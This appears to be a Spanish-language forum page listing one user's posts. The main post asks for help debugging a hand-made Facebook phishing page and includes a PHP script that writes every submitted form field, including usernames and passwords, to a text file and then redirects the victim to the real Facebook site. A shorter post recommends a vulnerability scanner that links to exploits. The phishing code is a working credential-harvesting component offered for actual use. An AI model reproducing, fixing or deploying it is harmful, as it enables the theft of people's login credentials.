Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - noquiero

#1
Buenas, intento probar un fake para pishing, de forma manual (no SET).

El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:

Código (php) [Seleccionar]

<?php
header 
('Location:https://he-il.facebook.com/');
$handle fopen("passwords.txt""a");
foreach(
$_POST as $variable => $value) {
   
fwrite($handle$variable);
   
fwrite($handle"=");
   
fwrite($handle$value);
   
fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>



Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.
#4
De Rapid7, tenes Nexpose. Muy bueno, a diferencia de OpenVas te linkea a los exploits adecuados.